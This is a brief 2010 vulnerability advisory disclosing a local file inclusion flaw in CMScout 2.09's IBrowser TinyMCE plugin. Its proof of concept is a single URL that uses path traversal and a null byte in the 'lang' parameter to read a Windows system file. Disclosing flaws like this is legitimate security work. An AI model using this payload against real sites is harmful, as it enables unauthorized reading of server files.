CMScout 2.09 / IBrowser TinyMCE Local File Inclusion

`------------------------------------------------------------------------  
Software................CMScout 2.09 / IBrowser TinyMCE Plugin  
Vulnerability...........Local File Inclusion  
Download................http://www.cmscout.co.za/  
Release Date............9/15/2010  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................John Leitch  
Site....................http://www.johnleitch.net/  
[email protected]  
------------------------------------------------------------------------  
  
--Description--  
  
A local file inclusion vulnerability in CMScout 2.09 / IBrowser  
TinyMCE Plugin can be exploited to include arbitrary files.  
  
  
--PoC--  
  
http://localhost/cmscout/tiny_mce/plugins/ibrowser/ibrowser.php?lang=../../../../../../../../windows/win.ini%00  
`